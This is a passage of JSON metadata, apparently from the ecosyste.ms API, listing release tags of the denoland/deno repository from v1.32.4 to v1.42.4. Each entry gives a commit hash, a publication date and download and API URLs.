4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/Git